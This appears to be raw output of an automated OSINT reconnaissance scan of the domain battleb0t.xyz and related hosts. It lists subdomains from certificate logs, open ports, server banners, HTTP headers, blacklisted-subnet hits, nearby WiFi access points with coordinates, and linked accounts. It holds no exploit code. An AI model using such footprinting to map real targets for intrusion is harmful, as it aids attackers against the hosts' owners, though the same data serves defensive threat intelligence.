"response": {"body": "<html>\r\n<head><title>404 Not 
Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.18.0 (Ubuntu)</center>\r\n</body>\r\n</html>\r\n", "_encoding": {"body": "DISPLAY_UTF8", "html_title": "DISPLAY_UTF8", "html_tags": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "html_title": "404 Not Found", "protocol": "HTTP/1.1", "body_size": 162, "body_hashes": ["sha256:340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87", "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f"], "status_code": 404, "body_hash": "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f", "headers": {"Date": ["<REDACTED>"], "_encoding": {"Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Server": ["nginx/1.18.0 (Ubuntu)"]}, "html_tags": ["<title>404 Not Found</title>"], "status_reason": "Not Found"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:47993c12bd45511268c274adb000951fc2436ea5a8e968b2b1f7b49fb5b05631"], "source_ip": "167.94.146.57", "extended_service_name": "HTTP", "observed_at": "2023-05-11T09:00:02.235713315Z", "banner_hex": "485454502f312e3120343034204e6f7420466f756e640d0a5365727665723a206e67696e782f312e31382e3020285562756e7475290d0a446174653a20203c52454441435445443e0d0a436f6e74656e742d547970653a20746578742f68746d6c0d0a5472616e736665722d456e636f64696e673a206368756e6b65640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a436f6e74656e742d456e636f64696e673a20677a69700d0a", "perspective_id": "PERSPECTIVE_TELIA", "banner": "HTTP/1.1 404 Not Found\r\nServer: nginx/1.18.0 (Ubuntu)\r\nDate: <REDACTED>\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nContent-Encoding: gzip\r\n", "port": 80, "software": [{"product": "nginx", "vendor": "nginx", "version": "1.18.0", "source": "OSI_APPLICATION_LAYER", "other": {"family": "nginx"}, "uniform_resource_identifier": 
"cpe:2.3:a:f5:nginx:1.18.0:*:*:*:*:*:*:*", "part": "a"}]}, {"tls": {"version_selected": "TLSv1_3", "certificates": {"_encoding": {"chain_fps_sha_256": "DISPLAY_HEX", "leaf_fp_sha_256": "DISPLAY_HEX"}, "chain_fps_sha_256": ["67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd", "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"], "chain": [{"issuer_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "subject_dn": "C=US, O=Let's Encrypt, CN=R3", "fingerprint": "67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd"}, {"issuer_dn": "O=Digital Signature Trust Co., CN=DST Root CA X3", "subject_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "fingerprint": "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"}], "leaf_data": {"pubkey_algorithm": "ECDSA", "public_key": {"key_algorithm": "ECDSA", "ecdsa": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "nHw/fXpTPJPh7RXQY/HEObaMVLT3ke0kPIUIN0WUC1w=", "x": "mCLSeRXmhneu3ZkCqqpIEcT5t89qEuMj/T3Pv+htI2M=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}, "fingerprint": "30f014a772b2784f28cc0c8eda057a195b3550629cbebeeea563bf4fba71e48c"}, "subject_dn": "CN=donation.ecash-pay.com", "pubkey_bit_size": 256, "fingerprint": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16", "issuer_dn": "C=US, O=Let's Encrypt, CN=R3", "names": ["donation.ecash-pay.com", "www.donation.ecash-pay.com"], "tbs_fingerprint": "7067e77960f4c789c8e143e4facda20855c120250ec8bfd5b30f06f36bf85662", "subject": {"common_name": ["donation.ecash-pay.com"]}, "signature": {"self_signed": 
false, "signature_algorithm": "SHA256-RSA"}, "issuer": {"common_name": ["R3"], "organization": ["Let's Encrypt"], "country": ["US"]}}, "leaf_fp_sha_256": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16"}, "cipher_selected": "TLS_CHACHA20_POLY1305_SHA256", "ja3s": "475c9302dc42b2751db9edcac3b74891", "_encoding": {"ja3s": "DISPLAY_HEX"}}, "_encoding": {"banner": "DISPLAY_UTF8", "banne |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | TDFFE (Net ID: 00:02:2D:42:1D:82) | 34.0544, -118.244 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | <hidden ssid> (Net ID: 00:01:E3:55:BC:8C) | 52.3759, 4.8975 |
| 2023-05-12 03:01:25 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.245): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:34 | BGP AS Membership | No | Censys | 0 | 0 | 3 | 0 | None | 13335 | 104.21.71.14 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | EPSON (Net ID: 00:00:48:03:3B:CF) | 41.8781, -87.6298 |
| 2023-05-12 03:09:49 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 81.170.74.34.bc.googleusercontent.com | 34.74.170.81 |
| 2023-05-12 03:27:33 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.128:443 | 188.114.96.0/24 |
| 2023-05-12 02:44:31 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | files.battleb0t.xyz | [{u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:50.261', u'id': 9313572020}, {u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:49.987', u'id': 9308913897}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.484', u'id': 9249459074}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.388', u'id': 9234809365}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:13.113', u'id': 9235878846}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': 
u'2023-04-24T04:50:12', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:12.941', u'id': 9221147142}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.973', u'id': 9235401447}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.703', u'id': 9220770682}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.723', u'id': 9022375882}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.353', u'id': 8994750711}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': 
u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.489', u'id': 9021136086}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.221', u'id': 9002142810}, {u'not_after': u'2023-06-21T22:37:04', u'not_before': u'2023-03-23T22:37:05', u'issuer_ca_id': 180753, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.battleb0t.xyz', u'serial_number': u'26cc7f01c692257813509e4880751557', u'entry_timestamp': u'2023-03-23T23:37:05.821', u'id': 8969484265}, {u'not_after': u'2024-03-21T23:59:59', u'not_before': u'2023-03-23T00:00:00', u'issuer_ca_id': 157938, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O="Cloudflare, Inc.", CN=Cloudflare Inc ECC CA-3', u'common_name': u'sni.cloudflaressl.com', u'serial_number': u'09cccb40358f10167bc737cb947e311a', u'entry_timestamp': u'2023-03-23T22:34:16.439', u'id': 8968494929}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.433', u'id': 8986351441}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.351', u'id': 8968126634}, {u'not_after': u'2023-06-13T23:40:09', 
u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.184', u'id': 8924480030}, {u'not_after': u'2023-06-13T23:40:09', u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.009', u'id': 8896621265}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.523', u'id': 8910975043}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.327', u'id': 8879939167}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.355', u'id': 8910971688}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': 
u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.097', u'id': 8879934651}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.564', u'id': 8805533709}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.238', u'id': 8735518973}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.219', u'id': 8798937211}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.05', u'id': 8726555656}, {u'not_after': u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.851', u'id': 8798923488}, {u'not_after': 
u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.639', u'id': 8726539247}, {u'not_after': u'2023-05-14T15:23:50', u'not_before': u'2023-02-13T15: |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cf-mitigated: challenge | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=qVGOB1rQJjQIM8j8t5Spm5SzuRznIdJDuYO5Jbpn3fZk%2BJxIqln47OJIYIKFh9H9g0ehIc6QmUjGxpPhNXDavBCNcEEJOQv%2BvWtEqWQkF532xy%2FfGHFy%2BS9fyHqoDn0%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:23 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f6071cb5443bc-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:01:32 | Raw Data from RIRs | No | Tool - WhatWeb | 1 | 0 | 3 | 0 | None | [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://panel.battleb0t.xyz', u'http_status': 301, u'plugins': {u'Country': {u'string': [u'UNITED STATES'], u'module': [u'US']}, u'HTTPServer': {u'string': [u'cloudflare']}, u'RedirectLocation': {u'string': [u'https://panel.battleb0t.xyz/']}, u'UncommonHeaders': {u'string': [u'report-to,nel,cf-ray,alt-svc']}, u'IP': {u'string': [u'104.21.71.14']}}}, {}] | panel.battleb0t.xyz |
| 2023-05-12 02:45:16 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 4 | 0 | None | {u'region_code': u'ON', u'country_tld': u'.ca', u'ip': u'2606:4700:3030::ac43:a8fc', u'currency_name': u'Dollar', u'currency': u'CAD', u'country_population': 37058856, u'country_code': u'CA', u'timezone': u'America/Toronto', u'city': u'Toronto', u'network': u'2606:4700:3030::/46', u'languages': u'en-CA,fr-CA,iu', u'version': u'IPv6', u'latitude': 43.6547, u'in_eu': False, u'utc_offset': u'-0400', u'continent_code': u'NA', u'country_name': u'Canada', u'country_capital': u'Ottawa', u'org': u'CLOUDFLARENET', u'postal': u'M5A', u'asn': u'AS13335', u'country': u'CA', u'region': u'Ontario', u'longitude': -79.3623, u'country_calling_code': u'+1', u'country_area': 9984670.0, u'country_code_iso3': u'CAN'} | 2606:4700:3030::ac43:a8fc |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Onward (Net ID: 00:06:25:D6:7A:6F) | 39.0469, -77.4903 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=VywvBB1i7auboS6du2SyYTMISxYgv0SAv9G2irfzrfSoLR0rWIxDql%2BDKBWgGtLF7kP8CwfOUwVMXmcuqTKfEc1L%2Fjta42Of8JEwGnOgDhCKAOR2s74ejvfrFg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5eeb1a42bf-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:10:22 | Malicious IP on Same Subnet | Yes | VoIPBL OpenPBX IPs | 0 | 0 | 4 | 0 | None | VOIPBL Publicly Accessible PBX List [46.101.128.0/17]<br>http://www.voipbl.org/update | 46.101.128.0/17 |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 1 | 5 | 0 | None | Netlify | {"content-length": "243", "accept-ranges": "bytes", "strict-transport-security": "max-age=31536000", "server": "Netlify", "etag": "\"c575cbc28e14cae03836d1d0fc69c052-ssl\"", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:54:18 GMT", "x-nf-request-id": "01H06Y2WPKRCCC7SJ49ZB68B31", "content-type": "text/css; charset=UTF-8", "age": "0"} |
| 2023-05-12 03:03:31 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 007.github.io |
| 2023-05-12 03:24:21 | Linked URL - Internal | No | Web Spider | 4 | 0 | 3 | 0 | None | https://ayhu.xyz/lol.html?__cf_chl_f_tk=s7qF6ZO3cVvdEEZa_WmCMPM6sxOwT7Q8EvJA4xw7FTE-1683861861-0-gaNycGzNChA | https://ayhu.xyz/lol.html?__cf_chl_f_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU |
| 2023-05-12 02:55:22 | Linked URL - Internal | No | Google | 5 | 0 | 1 | 0 | None | https://ayhu.xyz/lol.html | ayhu.xyz |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ZyXEL (Net ID: 00:02:CF:C6:25:17) | 40.2024, 29.0398 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BJNPSETUP (Net ID: 00:00:85:F4:A6:EC) | 41.8781, -87.6298 |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | YouTube Channel (Category: video)<br>https://www.youtube.com/c/Altpapier/about | Altpapier |
| 2023-05-12 02:53:42 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 404 Not Found<br>Connection: keep-alive<br>Content-Length: 5142<br>Server: GitHub.com<br>Content-Type: text/html; charset=utf-8<br>ETag: W/"64556a8c-239b"<br>Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'<br>Content-Encoding: gzip<br>X-GitHub-Request-Id: 1626:5CFD:236BDF0:36406A6:645D3ABC<br>Accept-Ranges: bytes<br>Date: <REDACTED><br>Via: 1.1 varnish<br>Age: 0<br>X-Served-By: cache-chi-klot8100102-CHI<br>X-Cache: MISS<br>X-Cache-Hits: 0<br>X-Timer: S1683831485.544725,VS0,VE28<br>Vary: Accept-Encoding<br>X-Fastly-Request-ID: b61afadfbad522ceb47c8a79f54a7ce4c88966b0 | 185.199.109.153 |
| 2023-05-12 02:47:25 | Open TCP Port | No | Pulsedive | 0 | 0 | 2 | 0 | None | 185.199.108.153:80 | 185.199.108.153 |
| 2023-05-12 02:54:23 | Open TCP Port | No | Censys | 0 | 0 | 4 | 0 | None | 2600:1f18:2489:8201::c8:443 | 2600:1f18:2489:8201::c8 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | x-cache-hits: 1 | {"content-length": "690", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-4fb\"", "x-cache-hits": "1", "cache-control": "max-age=600", "x-served-by": "cache-lga21959-LGA", "x-cache": "HIT", "x-github-request-id": "F620:0A4B:1087FED:17E0EF4:645DA7F4", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 02:54:04 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "88b13ec8ddf02c1379830d22f861ddb1826456ec", "date": "Fri, 12 May 2023 02:54:15 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "562", "x-timer": "S1683860056.740489,VS0,VE2", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/html; charset=utf-8"} |
| 2023-05-12 03:01:28 | Raw Data from RIRs | No | Tool - WhatWeb | 1 | 0 | 2 | 0 | None | [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://nwapi.battleb0t.xyz', u'http_status': 301, u'plugins': {u'Country': {u'string': [u'RESERVED'], u'module': [u'ZZ']}, u'HTTPServer': {u'string': [u'cloudflare']}, u'RedirectLocation': {u'string': [u'https://nwapi.battleb0t.xyz/']}, u'UncommonHeaders': {u'string': [u'cf-cache-status,report-to,nel,cf-ray,alt-svc']}, u'IP': {u'string': [u'172.67.168.252']}}}, {}] | nwapi.battleb0t.xyz |
| 2023-05-12 03:01:20 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.176): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 0 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/master058_3.PNG | https://funny.battleb0t.xyz/ |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | polygon (Category: gaming)<br>https://www.polygon.com/users/login | login |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | jk9@home (Net ID: 00:0C:F6:71:B1:B4) | 50.8897, 6.0563 |
